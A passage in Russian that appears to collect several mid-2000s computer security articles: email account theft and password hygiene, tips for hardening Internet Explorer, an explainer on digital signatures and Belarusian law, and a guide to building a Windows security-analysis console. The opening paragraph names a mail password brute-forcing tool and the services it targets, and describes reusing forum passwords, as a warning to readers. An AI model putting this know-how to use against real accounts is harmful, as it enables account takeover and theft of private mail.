Даже если хакер не захочет отвечать на ваш секретный вопрос, он просто может воспользоваться специальной программой для перебора паролей, благо в сети их множество. Работать с подобной программой очень просто — указываем адрес почтовика, имя пользователя или адрес ящика, указываем способ поиска пароля — вуаля и через некоторое время пароль у нас на блюдечке. Самая известная программа для перебора паролей — это DukeNN Mail Bruter 3.03, который позволяет подобрать пароль для таких сервисов, как Mail.ru, Yandex, Rambler, Yahoo, Inbox.ru и т. д. При этом программа может перебрать пароль множеством способов. А сама процедура редко занимает больше часа.
Кстати, хочу заметить — я не зря начал разговор с форумов и чатов; с помощью этой базы данных возможно узнать ваш пароль. Большинство пользователей используют один и тот же пароль и для почтового ящика, и для чата, и для форума. Что, естественно, упрощает взлом и завладение вашим e-mail. Так, многие хакеры перед тем, как начать перебор паролей, подставляют пароль, найденный на форуме.
В итоге, у хакера на руках: ваша личная переписка, имя пользователя и пароли к сервисам. Хорошо, если среди паролей не попадется пароль на сервис WebMoney или другие платежные системы, иначе вы можете лишиться всех ваших вложений. В принципе, хакер может воспользоваться ваши паролями для взлома других форумов и чатов, а также завладения некоторой информацией о вас. Еще один вариант — это использование почтового ящика для рассылки СПАМа, и если это произойдет, вы потеряете ваш адрес навсегда.
Хорошо, если под атакой оказался простой домашний пользователь. С предприятиями ситуация гораздо мрачнее. Так как у многих организаций сейчас появился выход в Интернет, большинство сотрудников стало общаться в чатах и различных службах знакомства. Зная, что многие предприятия поскупились на заработную плату системного администратора, можно сказать, что почта опять-таки не защищена. Предположим, что хакер нашел e-mail бухгалтера или менеджера, а соответственно после некоторого времени он получит доступ ко всей информации на компьютере, такой как счета, закрытая служебная информация, накладные и т. д. С компьютера пользователя можно получить доступ к главному серверу предприятия, на котором может располагаться все, что угодно. Думаю, конкуренты согласятся выложить круглую сумму для того, чтобы узнать о вашем предприятии все.
Что же делать для того, что ы описанное выше не случилось? Ну, во-первых, необходимо приучить себя к тому, чтобы не использовать одинаковые пароли. Кстати, о паролях, идеальный пароль должен содержать большие и маленькие буквы, цифры, а также, если это позволено, технические символы, типа запятых и скобок. И запомните, чем длиннее пароль, тем дольше он будет защищен от взлома. Но тут есть одно неудобство — большие пароли трудно запоминать, и велик соблазн записать на бумажку, которая по закону подлости потеряется. Но программисты нас выручили, написав программы для генерации и хранения паролей. Так, например, программа LexxPossPass позволяет сгенерировать пароль любой сложности, а SCARABAY позволит сохранить ваш пароль в надежном месте. Также всторенные менеджеры паролей встречаются сейчас во многих браузерах, например, в FireFox. И даже если их нет, то есть надстройки, в которых и осуществляется механизм сохранения и защиты паролей.
Для тех же, кто не хочет доверяться программам, есть еще один способ придумать заковыристый пароль. Я думаю, что у каждого есть любимые афоризмы, анекдоты или просто шутки — вот их мы и будем использовать в качестве пароля. Можно также использовать различные формулы из школы или ВУЗа. У такого способа один недостаток — необходимо все вводить вручную, что потребует некоторого времени.
Во-вторых, ответы на секретные вопросы не должны быть типовыми, лучше посидеть, поломать голову над вопросом и ответом, чем поплатиться от потери всей ваши переписки. В-третьих, рекомендую настроить и пользоваться стандартными почтовыми средствами, а не хранить переписку в on-line папках. Благо, в наше время есть очень хорошие программы, например, The Bat, Mozilla Thunderbird. В-четвертых, если есть возможность, заведите отдельный ящик для чатов и форумов.
Эти простые шаги помогут добавить препятствий хакеру на пути к вашей информации, но не смогут полностью защитить ваш компьютер.
Делаем IE (Internet Explorer)более безопасным
Вы страдаете от недуга, именуемого brauseritis insecurius (боязнь утечки данных через браузер)? Если это так, то не спешите переходить с Internet Explorer на что-то незнакомое вроде Firefox или Opera, а воспользуйтесь моими советами и инструментами, чтобы укрепить иммунитет своего привычного браузера.
Досадная неприятность. В моей системе работает антишпионская программа, но когда я зашел на один забавный видеосайт, на экране всплыло сообщение о том, что он вызывает подозрение. Как поступить, чтобы защитить себя, не затрачивая дополнительных денег?
Способы лечения. Вообще-то можно выключить ПК и достать старую пишущую машинку. Нет-нет, я вовсе не хочу сказать, что вы должны что-то покупать. Применение какой-нибудь антишпионской программы — дело совершенно обязательное, у меня лично установлена программа CounterSpy за 20 долл. (здесь и далее указаны цены в США. — Прим. ред.) компании Sunbelt, победитель конкурса «Мировой класс» журнала PC World (пробная ее версия доступна по адресу find.pcworld.com/46684). Однако добавить к имеющейся программе один-два необременительных слоя защиты очень даже полезно. Вот три приема, на которые полагаюсь я.
Прежде всего, всегда использую недооцениваемую функцию Internet Explorer — отнесение узлов Сети к зоне ограниченно безопасных. Включение какого-либо сайта в данную зону ужесточает параметры безопасности браузера. (Посмотрите, как это выглядит, выбрав опции «Сервис Свойства обозревателя Безопасность».) Если вы добавляете некий веб-узел к зоне «Ограниченные узлы», Internet Explorer отключает для выбранного сайта загрузку элементов ActiveX, сценарии и Java-приложения. Таким образом, заходя на ту или иную страницу сайта, входящего в зону «Ограниченные узлы», вы будете защищены, скажем, от попыток несанкционированной загрузки на компьютер какой-нибудь шпионской программы (такое неприятное действие называется drive-by download).
Впрочем, добавлять сайты в зону «Ограниченные» вручную — занятие очень утомительное. Бесплатный продукт SpywareBlaster компании JavaCool автоматически переносит туда длинный список опасных адресов. Помимо IE эта утилита совместима с браузером AOL, а также работает с нынешними версиями Netscape и Firefox. Версия SpywareBlaster с номером 3.4 доступна по адресу find.pcworld.com/48588.
Далее обзаведитесь копией программы Klik Safe — бесплатного дополнения к Internet Explorer, созданного фирмой Globi (find.pcworld.com/48370). Столкнувшись на незнакомой территории с каким-нибудь узлом, возможно еще не вошедшим в список SpywareBlaster, используйте Klik Safe для защиты. Предупреждая угрозу со стороны ActiveX и JavaScript, этот инструмент позволяет немедленно переключить уровень безопасности Internet Explorer со среднего на высокий, благодаря чему не нужно выполнять вручную уйму операций. Когда же вы направляетесь на какой-либо сайт, в надежности которого уверены (например, на страницу обновлений компании Microsoft), то используйте Klik Safe, для того чтобы добавить данный сайт в зону «Надежные узлы» Internet Explorer. Тем самым вы гарантируете, что ActiveX будет работать как надо.
Просмотр файлов: безопасность прежде всего
Досадная неприятность. У меня сложилось впечатление, будто я каждый день натыкаюсь на сообщение о каком-нибудь совершенно новом вирусе. Запуганный подобным явлением, я перестал открывать заархивированные файлы и изображения. Что это у меня, паранойя?
Способы лечения. Как говорил Зигмунд Фрейд (в известном историческом анекдоте) по поводу пригрезившихся образов продолговатых предметов, иногда образ — всего лишь образ и ничего более. Но подозрительность в таком случае — позиция мудрая. Даже если вы регулярно обновляете свое антивирусное ПО, встроенные в изображения троянские программы и вирусы могут-таки проникнуть в компьютер. Утилита для просмотра файлов RedWall компании Novatix защищает от подобных угроз и тогда, когда антивирусное ПО не обновлялось. RedWall позволяет просматривать файлы, поместив их в своего рода карантин, где они не представляют угрозы. Программа интегрируется с Internet Explorer, Outlook и Outlook Express, а также работает с Eudora и большинством остальных почтовых приложений. Конечно, она несколько дороговата (50 долл.), но зато позволяет просматривать около 200 различных типов файлов, включая документы Office, файлы изображений и даже видеоданные. Пробную версию RedWall можно переписать по адресу find.pcworld.com/48596.
Steve Bass. Four Tips to Make IE More Secure. PC World, сентябрь 2005 г., с. 43.
Раскрываем окно IE на нужную ширину
Когда я открываю Internet Explorer, то эта глупая программа может либо раскрыть свое окно во весь экран, либо предстать в маленьком окошке или вообще свернутой на Панели задач. Вот как можно положить конец такому бестолковому поведению. Откройте IE, нажмите клавишу и, удерживая ее, щелкните на какой-нибудь ссылке. На экране раскроется новое окно IE. Установите его размер и позицию, которые вас устраивают, но только не разворачивайте окно во весь экран. Теперь вернитесь в первое окно IE и закройте его, а потом закройте второе окно IE. Если это не поможет и IE будет по-прежнему раскрываться как бог на душу положит, используйте IE New Window Maximizer. Эта бесплатная утилита заставляет IE полностью разворачивать новые окна. Она также позволяет использовать «горячие» клавиши для свертывания и раскрытия окон IE и закрывает всплывающие окна. Получить эту утилиту можно по адресу find.pcworld.com/48598.
Документы без печатей — Шифрование электронного документа
Автор: Игорь Орещенков
Информационные технологии шагают по планете. Пожалуй, уже сложно найти организацию, предприятие или фирму, офис которой не освещали бы экраны мониторов. Компьютеризация делопроизводства — свершившийся факт. Вспомним, как все начиналось. Увеличивалась емкость магнитных носителей информации. В популярных статьях авторы вещали о том, сколько страниц текста (потом — книг, «Больших советских энциклопедий», библиотек…) можно записать на дискету или жесткий диск. Появились оптические носители невообразимой емкости. Печатные машинки ушли в прошлое, уступив место компьютерам. Секретари хранят подготовленные шаблоны документов и перед распечаткой лишь подставляют нужные данные вместо того, чтобы всякий раз «отстукивать» полный текст.
В околокомпьютерных кругах витают оптимистические ожидания сокращения объема бумажной документации, оценивается экономический эффект от переноса информации с бумаги «в цифру», подсчитываются кубометры спасенных от вырубки зеленых насаждений. В то же самое время исследования, которые были проведены в странах с развитой информационной инфраструктурой, показали не уменьшение, а, наоборот, увеличение расхода бумаги. И дело не только в том, что современные принтеры в случае небольшой опечатки, допущенной сотрудником в тексте договора или платежного документа, позволяют производить макулатуру со скоростью от 12 листов в минуту. Ведь документ можно было бы вообще не распечатывать, ошибку исправить прямо в файле и передать партнерам или банку файл с корректным документом — и никакой бумаги. Ведь прочитать документ можно и с экрана монитора. Однако, ведя дела таким образом, можно попасть в ситуацию, когда недобросовестный партнер исправит в подготовленном вами договоре сумму сделки и предъявит вам этот файл как исходный. Как определить, что в файле сохранено именно то соглашение, которое было достигнуто в результате переговоров? По дате и времени внесения изменений? Но ведь эта информация подвержена несанкционированному изменению точно так же, как и текст документа! По размеру файла?
Но ведь число «1.000.000» занимает в файле столько же места, что и «9.999.999»! Неужели тупик? Неужели созданная инфраструктура, позволяющая передавать текст, звук и изображения практически мгновенно из одной точки земного шара в другую, способная многократно ускорить ведение бизнеса, а значит, увеличить его прибыльность, бессильна помочь в случаях, когда требуется оттиск печати и собственноручная подпись? Как известно, любая техническая проблема может быть успешно решена, если для ее решения предоставлено достаточное количество времени и денег. Описанная выше ситуация не стала исключением. Информационные технологии оказались слишком привлекательной сферой для большого бизнеса. А отсчет времени начался с тех незапамятных времен, когда Мухамед ибн Муса ал-Хорезми, уроженец Хивы, впервые сформулировал правила выполнения арифметических действий над целыми числами и простыми дробями. Однако обо всем по порядку.
Чтобы рассказать о том, как защитить файлы с текстами договоров, соглашений, обязательств, отчетов, платежных инструкций от несанкционированных изменений, нужно затронуть тему криптографии. За многие века тайнопись (так переводится с греческого слово «криптография») прошла длинный путь от искусства составления головоломок до науки, базирующейся на прочном математическом фундаменте. Именно использование математических методов для выполнения обратимого преобразования текстов в непроизносимую кашу из букв, цифр, знаков препинания и прочих графических символов позволило создать стойкие шифры. Может возникнуть вопрос, какое отношение имеет математика к обработке текстов?
Но ведь текст состоит из слов, а слова, в свою очередь, состоят из букв (в этой статье не рассматриваются тексты на восточных языках, записанные с использованием иероглифов). Упорядоченное множество букв составляет алфавит того языка, на котором написан текст. Буквы алфавита можно пронумеровать, то есть каждой из них можно поставить в соответствие число. Иными словами, существует взаимно однозначное соответствие между множеством букв и подмножеством натуральных чисел. А раз так, то от рассмотрения букв можно перейти к рассмотрению чисел. C числами можно выполнять арифметические действия. Арифметические действия могут выстраиваться в длинные цепочки. Способ, с помощью которого из одного числа получается другое, называется функциональным преобразованием и записывается в виде Y = F (X), где X — аргумент функции F, а Y — ее результат. После выполнения преобразований от чисел можно снова вернуться к буквам, из получившихся букв можно сложить слова и получить текст, который, скорее всего, будет нечитаемым. Таким образом получается шифротекст — запись исходного текста в виде, непригодном для прочтения.
Чтобы расшифровать текст, нужно выполнить обратные действия, то есть операцию X = F-1(Y), где F-1 — обратное функциональное преобразование. Можно придумать, и было придумано, множество способов выполнения криптографических преобразований F и F-1 — от наивных (в которых каждая буква текста заменяется на соседнюю в алфавите) до весьма хитроумных. Однако практика показала, что шифры, основанные на секретности способа преобразования не являются достаточно стойкими. Гораздо лучше, когда шифротекст, получающийся при шифровании, зависит не только от исходного текста и способа преобразования, но и от дополнительного параметра, или, как его назвали, ключа шифрования K. Тогда даже в том случае, когда известны сами преобразования (последовательности действий) F и F-1, расшифровать текст невозможно без знания секретного ключа K. Криптографические методы вида Y= F(X, K); X= F-1(Y, K) (1), в которых для шифрования текста и его расшифровки используется один и тот же ключ K, получили название симметричных алгоритмов шифрования. Эти алгоритмы получили широкое распространение. В компьютерных системах они обеспечивают конфиденциальность информации, хранимой на машинных носителях и передаваемых по каналам связи. Еще раз отметим, что зашифрованные таким способом файлы невозможно прочитать без знания пароля — ключа, с использованием которого производилось шифрование.
Однако математики на этом не остановились. Ими был открыт еще один очень интересный способ шифрования. Оказывается, существуют функции, для которых очень легко выполнить преобразование R=G(Q), но обратное преобразование чрезвычайно трудоемко. Настолько, что, если на одну элементарную операцию этого преобразования тратить один квант энергии, то для вычисления Q=G-1(R) не хватит мощностей всей энергосистемы Земли. Запомним этот примечательный факт. Но что же с ним делать? Очевидно, что два числа Q и R связаны между собой преобразованием G. Следовательно, пары таких чисел можно рассматривать как самостоятельные объекты. Обратим внимание на то, что новую пару чисел Q и R получить легко, а вот по имеющемуся числу R восстановить число Q практически невозможно. Были найдены такие криптографические преобразования F и F-1, в которых для того, чтобы зашифровать текст, нужно было использовать в качестве ключа число Q, а чтобы его расшифровать — число R (не забываем, что Q и R — не какие-нибудь произвольные числа, а пара чисел, связанных между собой преобразованием G). Или, более лаконично, Y=F(X, Q); X=F-1(Y, R) (2). То есть, если текст зашифровать с использованием какого-нибудь ключа, то этот ключ будет абсолютно бесполезен при расшифровке текста. Чтобы расшифровать зашифрованный таким способом текст, необходим другой ключ, который легко вычислить на основе ключа, использованного при шифровании. Но вот зная ключ для расшифровки, вычислить ключ шифрования не удастся. Из-за такого неравноправия ключей описанные методы шифрования получили название асимметричных алгоритмов. Заметим только, что выбор ключа из пары чисел осуществляется произвольно. С таким же успехом для шифрования можно было использовать число R, но тогда для расшифровки пришлось бы воспользоваться числом Q.
Для открытия способа, которым можно защитить текст от несанкционированного изменения, осталось сделать один шаг. Пусть у нас имеется некоторый текст X. Мы можем зашифровать его с использованием асимметричного алгоритма и ключа Q. Получится абракадабра шифротекста Y. Если в исходном тексте X заменить хотя бы одну букву и снова выполнить шифрование, то получится тоже абракадабра, но совсем не похожая на предыдущую. Оно и понятно. А что же дальше? Шифротекст Y можно передать кому угодно вместе с ключом расшифровки R. Но ведь тогда же этот «кто угодно» может запросто прочитать зашифрованное сообщение! Правильно, сможет. И пусть расшифровывает и читает. Ведь наша цель состояла в другом. Вспомнили? Что будет, если «кто угодно» изменит хотя бы одну букву в шифротексте Y? Да этот шифротекст просто потеряет всякий смысл. Его невозможно будет расшифровать ключом R, да и, скорее всего, никаким другим ключом тоже. Значит, наша цель достигнута? Без нашего ведома никто не сможет изменить текст и выдать его за исходный.
Зачем же автору понадобилось рассказывать про мудреные асимметричные алгоритмы шифрования? Ведь при использовании гораздо более понятного симметричного алгоритма можно получить тот же самый результат: взять ключ K, зашифровать текст X, получить шифротекст Y и передать его вместе с ключом… Вы хорошо подумали? Допустим, «некто» получил Y и K, выполнил расшифровку, и ему не совсем понравилось содержание исходного текста. Настолько не понравилось, что он взял да и чуть-чуть его изменил, в результате чего получился текст X-штрих (по которому вы должны этому «некто», предположим, N-значную денежную сумму). А потом спокойненько зашифровал его ключом K и представил на суд шифротекст Y-штрих. Как вы сможете доказать, что это — не то, что вы хотели сказать?
Чтобы этого не произошло, приходится использовать более сложные, но единственно возможные в описанной ситуации асимметричные алгоритмы шифрования. Из приведенного примера должно быть понятно, что при использовании асимметричных алгоритмов ключ шифрования Q нужно хранить в секрете. Ведь с его помощью можно из любого открытого текста получить шифротекст, который подлежит расшифровке (а значит, и проверке) с помощью открытого ключа R. Если секретный ключ Q станет известен злоумышленнику (в такой ситуации говорят, что ключ Q скомпрометирован), то этот злоумышленник сможет зашифровать любой документ и представить его от вашего имени. Напротив, хранить открытый ключ R нет никакого смысла. Его предназначение как раз в том и состоит, чтобы любой желающий мог расшифровать созданный вами шифротекст и таким образом убедиться в его подлинности. Из-за описанных особенностей ключей асимметричные алгоритмы иногда называют алгоритмами с открытым ключом.
Говорят, что в старые времена разрубали монету и давали по одной половинке двум гонцам. Даже если они не были знакомы между собой, при встрече они могли сложить имеющиеся у них части монеты и убедиться, что служат общему делу. Для образности можно сравнить монету с ключом асимметричной криптографии, а части этой монеты — соответственно с секретным и открытым ключами. Вспомним о том, что секретный и открытый ключи, вообще говоря, взаимозаменяемы. То есть, если сообщение шифруется с помощью одного ключа, его можно расшифровать с помощью другого. Как можно использовать это свойство на практике?
Предположим, что кто-то хочет передать вам конфиденциальное сообщение таким образом, чтобы прочесть его мог только адресат. В этом случае ему достаточно узнать ваш открытый ключ (как было выяснено выше, это не составляет никакой проблемы и не несет никакой угрозы), а потом выполнить шифрование сообщения с его помощью. Полученный шифротекст может быть передан вам по открытым каналам связи. В соответствии с обсужденными выше свойствами криптографии с открытым ключом исходное сообщение может быть восстановлено из такого шифротекста только обладателем секретного ключа. Однако в этой статье основное внимание уделяется описанию средств защиты файлов от несанкционированных изменений. В этом направлении осталось рассмотреть еще один момент.
Предположим, что файл имеет достаточно большой размер. Если зашифровать его описанным выше способом, получится шифротекст, по размеру сравнимый с исходным файлом. Конечно, его можно расшифровать с помощью открытого ключа (заодно проверив целостность), но удобнее все-таки иметь перед глазами открытый текст, а количество абракадабры для служебных целей уменьшить. Для этих целей используются так называемые хэширующие преобразования, которые из текста произвольной длины позволяют получить текст фиксированной длины существенно меньше исходного текста. А основным свойством таких преобразований является то, что при небольших изменениях исходного текста результаты преобразования меняются очень сильно, так что практически невозможно для двух различных осмысленных исходных текстов получить одинаковые хэш-преобразования. Как этим воспользоваться? Выполняется хэширование исходного текста, а уже результат шифруется асимметричным алгоритмом с использованием секретного ключа.
Для проверки подлинности предъявляются шифротекст, открытый ключ и исходный текст. Во-первых, по исходному тексту тем же самым способом вычисляется хэш-преобразование, во-вторых, шифротекст расшифровывается с помощью открытого ключа. Если оба результата идентичны — значит, текст не претерпел изменений. Таким образом, шифротекст, полученный только что описанным способом, позволяет установить подлинность документа. Но, поскольку этот шифротекст вырабатывается с использованием секретного ключа, он же позволяет идентифицировать владельца. Никто, кроме владельца секретного ключа, не сможет создать такой шифротекст. Этот факт позволяет использовать его в качестве личной подписи владельца секретного ключа под файлом с текстом документа — электронной цифровой подписи (ЭЦП).
Но пора вернуться из идеального мира математических теорий к реальному миру экономических отношений. Предположим, что две стороны (назовем их условно «А» и «Б») решили организовать между собой обмен документами на машинных носителях. При всем взаимном уважении и доверии во избежание конфликтных ситуаций и для упрощения процедуры разрешения споров они решили использовать механизм ЭЦП. Это допускается в соответствии с п. 2 ст. 161 «Гражданского кодекса Республики Беларусь».
Как должен выстраиваться документооборот между этими сторонами? В первую очередь, стороны должны договориться об использовании средств ЭЦП. Лучше, если это будет программный или программно-аппаратный комплекс, сертифицированный в нашей стране. Хотя сегодня это условие и не является, насколько известно автору статьи, обязательным, его выполнение защитит от откровенно слабых систем и избавит от необходимости замены системы ЭЦП при планируемом ужесточении законодательства (в наиболее ответственных секторах банковской системы в соответствии с Постановлением Комитета по стандартизации, метрологии и сертификации при Совете Министров Республики Беларусь № 35 от 30.07.2004 г. «Об утверждении перечня продукции, услуг, персонала и иных объектов оценки соответствия, подлежащих обязательному подтверждению соответствия в Республике Беларусь», должны использоваться только сертифицированные средства ЭЦП). После того, как средство ЭЦП выбрано, стороны должны выполнить генерирование ключей — по открытому и секретному (личному) ключу ЭЦП для каждой стороны (рис. 1.)

Рис. 1. Пара ключей ЭЦП стороны «А» (слева) и стороны «Б» (справа).
Ключ Q — секретный (личный), ключ R — открытый.
Чтобы каждая сторона могла удостовериться в подлинности ЭЦП, поставленной под документом другой стороной, они должны обменяться открытыми ключами. Однако этот процесс не так прост, как может показаться. Ведь в случае конфликтной ситуации одна из сторон может заявить, что тот открытый ключ, который был использован при проверке ЭЦП под документом, не ее, а неизвестно чей. Чтобы исключить всякие недоразумения, Законом Республики Беларусь от 10.01.2003 г. «Об электронном документе» предусматривается обмен карточками открытых ключей ЭЦП — распечатками ключей на бумажном носителе, заверенных их владельцами традиционным способом — личной подписью и печатью. Неужели нельзя совсем обойтись без печатей? Работы в этом направлении ведутся.
Как сообщалось в 32-м номере «Национальной экономической газеты» от 03.05.2005 г., Национальный банк разрабатывает проект создания удостоверяющего центра электронной подписи, в котором, как в хранилище, будут содержаться ключи ко всем цифровым подписям, имеющимся у граждан Беларуси. Пункт о создании Центра управления ключевой информацией включен в Концепцию развития национальной платежной системы Республики Беларусь до 2010 г. В этом центре предполагается организовать хранение сертификатов открытых ключей участников системы межбанковских расчетов и клиентов всех банков. После обмена открытыми ключами стороны могут использовать все прелести работы с электронными документами. Предположим, что сторона «А» хочет подписать некоторый документ и передать его стороне «Б». Предположим также, что документ этот является конфиденциальным. Как поступать в этом случае? Сначала для документа должна быть выработана ЭЦП с использованием соответствующих технических средств и секретного ключа стороны «А» (рис. 2).

Рис. 2. Получение ЭЦП для документа с использованием секретного ключа отправителя
Из исходного текста документа и его ЭЦП формируется электронный документ. Здесь нужно четко понимать, что электронный документ — это не просто файл на магнитном носителе с текстом документа, но файл, состоящий из двух частей: общей (в которой как раз и содержится текст) и особенной, содержащей все необходимые ЭЦП (рис. 2а.) Текст документа без ЭЦП — это не более чем обычный текст (например, статья в этой газете), который не имеет юридической силы. Его можно распечатать, передать по электронной почте, отредактировать, но нельзя установить его подлинность. ЭЦП без текста документа вообще представляет собой непереводимую игру букв. Восстановить документ по ЭЦП невозможно точно так же, как невозможно восстановить дворец по найденному кирпичу. ЭЦП сама по себе не имеет ни ценности, ни смысла.

Рис. 2а. Текст документа + ЭЦП = электронный документ
Чтобы обеспечить конфиденциальность при передаче по открытым каналам, он может быть зашифрован с использованием открытого ключа корреспондента — стороны «Б» (рис. 3).

Рис. 3. Шифрование электронного документа с использованием открытого ключа получателя
Получившийся зашифрованный текст может быть безопасно передан стороне «Б», например, по электронной почте через Интернет. Сторона «Б», в свою очередь, должна сначала расшифровать полученный документ, используя свой секретный ключ (рис. 4).

Рис. 4. Расшифровка электронного документа с использованием секретного ключа получателя
Расшифровав текст, его можно прочитать, однако, чтобы убедиться в том, что он передан именно стороной «A», нужно проверить цифровую подпись, пришедшую вместе с текстом электронного документа (рис. 5).

Рис. 5. Проверка ЭЦП с использованием открытого ключа отправителя
Так выглядит схема передачи файла из пункта «А» в пункт «Б». Если осуществляется передача в обратном направлении, в описанных шагах нужно поменять местами ключи отправителя и получателя. Но это не единственное приложение криптографии с открытым ключом. Вернемся к обсуждению ситуации, приведенной в самом начале статьи. Две стороны хотят составить договор в электронном виде и защитить его от внесения изменений. Поскольку стороны равны перед законом, каждая из них должна подписать один и тот же документ (файл) с использованием своего личного (секретного) ключа, после чего обменяться полученными цифровыми подписями. В этом случае (при наличии заверенных карточек открытых ключей каждой из сторон) проверить подлинность файла не составит труда. Выполняется проверка ЭЦП точно так же, как было описано в примере с передачей сообщений. Итак, чтобы установить доверительные отношения в электронном документообороте, стороны должны:
1. Заключить соглашение об использовании электронных документов.
2. Сгенерировать ключи в соответствии с документацией на выбранный комплекс средств ЭЦП.
3. Принять меры к защите личного (секретного) ключа ЭЦП от компрометации (разглашения). Носитель, на котором хранится личный ключ, определяется используемыми средствами ЭЦП и может представлять жесткий диск компьютера, гибкий диск (дискету) или устройство хранения на базе энергонезависимой памяти. Как правило, личный ключ дополнительно шифруется, и для его использования нужно ввести пароль или PIN-код. В любом случае, если ключ хранится на несъемном диске, нужно ограничить доступ к компьютеру со средствами ЭЦП. Если же ключ хранится на съемном носителе, это устройство следует хранить, например, в сейфе вместе с печатью организации.
4. Обменяться открытыми ключами ЭЦП и заверенными карточками открытого ключа ЭЦП.
Обмен электронными документами для нашей страны — словами героя известной комедии Гайдая, «дело новое, неосвоенное» (за исключением, пожалуй, финансовых учреждений). Как это обычно бывает со всякими новинками, они несут в себе как блистательные перспективы, так и некоторые до поры до времени скрытые недостатки. Так ли все радужно на описываемом фронте? Нет ли каких-нибудь подводных камней? Ответить на это можно словами другого героя того же фильма — если «разобраться, что к чему», то разумное использование средств ЭЦП может избавить от некоторых неудобств и поможет сэкономить на расходных материалах. Для этого прежде всего нужно ознакомиться с положениями уже упоминавшегося выше «Закона об электронном документе». Использование электронных документов в различных областях человеческой деятельности — уже реальность. Успешно функционируют системы «Клиент-банк», позволяющие передавать в банк платежные инструкции по открытым каналам связи. Реализовано управление лицевым счетом и возможность совершения безналичных платежей с использованием средств мобильной связи или посредством банкоматов и инфокиосков. Организован обмен электронными документами персонифицированного учета между плательщиками страховых взносов и Фондом социальной защиты населения.
Таким образом, текст документа на машинном носителе, снабженный электронными цифровыми подписями сторон — электронный документ — вполне способен заменить традиционный «бумажный» документ с личными подписями и печатями. Для этого уже сегодня имеется необходимая техническая и законодательная база.
Собственный инструмент для анализа безопасности Windows
Автор: Скотт Данн
В настоящее время тема безопасности укоренилась во всех умах и обосновалась на всех компьютерных экранах. Напоминания об опасности всплывают в веб-браузерах, в интерфейсах электронной почты, в антивирусном ПО, в сетевых настройках и в прочих программных приложениях. Однако исследование всех тех закоулков, где Windows прячет свои настройки безопасности, может оказаться такой работой, которая не оставит вам времени ни для чего другого.
К счастью, Windows XP Professional и 2000 содержат готовые строительные блоки для создания инструмента, способного провести всесторонний анализ безопасности и соответствующую настройку конфигурации. (Если установлена Windows XP Home, то ваши потребности должны удовлетворить средства обеспечения безопасности, встроенные в пакет обновлений Service Pack 2.) Но вот собрать имеющиеся блоки в единый инструментальный комплект придется самостоятельно. Я расскажу, как скомпоновать эту утилиту, как использовать ее для анализа системы и какие действия предпринять по полученным результатам. И хотя входящая в состав Windows утилита «Анализ и настройка безопасности» не имеет дела с безопасностью электронной почты и других приложений, она тем не менее позволяет задавать в одном месте все параметры безопасности Windows, относящиеся к системному уровню. Изменения в таких параметрах могут влиять на используемые вами подключения к локальной сети и к Интернету, на приложения и настройки Реестра Windows, так что прежде чем заниматься любыми серьезными перестройками системы, необходимо создать ее резервную копию. После каждого изменения настроек проверяйте приложения и сетевое подключение, дабы убедиться в том, что они работают корректно. При возникновении любой проблемы восстанавливайте Реестр.
Создаем свое ПО
Для создания собственного инструмента анализа безопасности войдите в систему как администратор, выберите «Пуск-Выполнить», введите команду mmc и нажмите клавишу . В раскрывшемся окне задайте опции «Консоль-Добавить или удалить оснастку». Щелкните затем на кнопке «Добавить», выберите из раскрывшегося списка позицию «Анализ и настройка безопасности», опять щелкните на кнопке «Добавить», а потом на кнопках «Закрыть» и OK.
Теперь под маленьким значком «Корень консоли» появится подзначок «Анализ и настройка безопасности», но никаких других ветвей в дереве не будет. Чтобы их добавить, создайте базу данных параметров. Для этого щелкните правой кнопкой мыши на значке «Анализ и настройка безопасности» и выберите опцию «Открыть базу данных». В графу «Имя файла» введите название базы данных, например «Мои настройки безопасности», и нажмите . После этого вам будет предложено импортировать какой-нибудь шаблон. (Если соответствующее диалоговое окно не появится или вы его случайно закроете, то снова щелкните правой кнопкой на значке «Анализ и настройка безопасности» и выберите опцию «Импорт шаблона».)
Разнообразие шаблонов варьирует, начиная от устанавливаемого в Windows по умолчанию шаблона setup security.inf до hisecws.inf, задающего высокую безопасность. Если вы не эксперт в области управления сетями и не специалист по безопасности (или вы не убеждены в том, что к системе определенно надо применить какой-то другой шаблон), то выберите setup security и щелкните на кнопке «Открыть» (рис. 1). (Если показываются расширения имен файлов, то имя будет отображаться на экране как setup security.inf.)

Рис. 1. Выберите подходящий для себя уровень безопасности, используя один из этих шаблонов
Сохраните созданный вами инструмент, чтобы в дальнейшем к нему можно было бы снова обращаться, не проходя перечисленные выше шаги. Для этого задайте опции «Консоль-Сохранить как» и укажите, где должен быть сохранен файл утилиты. Если вы сохраняете его в папке «Администрирование» меню «Пуск» (оно же Главное меню; такое место сохранения выбирается по умолчанию), то сможете запустить данную утилиту, выбрав ее из меню «Пуск-Все программы-Администрирование». В том случае, когда соответствующий значок там отсутствует, щелкните правой кнопкой мыши на экранной кнопке «Пуск», задайте опции «Свойства-Меню «Пуск»-Настроить-Дополнительно») и в списке элементов меню «Пуск» выберите нужный вариант отображения. Обычный путь к папке «Администрирование» таков:
C: \Documents and Settings\All Users\Главное меню\Программы\Администрирование
(в графе «адрес Проводника» отображается как
C: \Documents and Settings\ All Users\Start Menu\Programs\Administrative Tools).
Если вы не хотите, чтобы все посетители, вошедшие в систему, видели этот элемент, то измените путь, задаваемый по умолчанию. Введите имя, например Анализатор безопасности, и нажмите .
Проводим проверку безопасности
Чтобы проанализировать систему и сравнить ее параметры безопасности с теми, что зафиксированы в вашем шаблоне, щелкните правой кнопкой мыши на значке «Анализ и настройка безопасности» и выберите опцию «Анализировать компьютер» (рис. 2). Укажите путь к файлу журнала ошибок или просто примите путь, предлагаемый по умолчанию.

Рис. 2. С помощью инструмента «Анализ и настройка безопасности» можно проанализировать состояние дел с параметрами безопасности вашего ПК одним щелчком мыши
Когда анализ будет завершен, то на левой створке окна должны будут отобразиться новые ветви. Чтобы увидеть, чем отличаются настройки безопасности компьютера от параметров, зафиксированных в шаблоне, последовательно щелкайте на маленьком значке «+» до тех пор, пока не доберетесь до конца ветви. Потом щелкните на значке в самом конце ветви — и увидите параметры безопасности для данной категории на правой створке окна (рис. 3).

Рис. 3. Сканирование безопасности показывает, как система выглядит на фоне настроек параметров безопасности, заданных в Windows по умолчанию
Значки, стоящие слева от многих из элементов, показывают, как соотносятся настройки вашего ПК с базой данных выбранного шаблона. Таблица «Экзамен по безопасности: оценки в ведомости» разъясняет значение этих значков (в Windows 2000 из них отображаются лишь три первых значка).
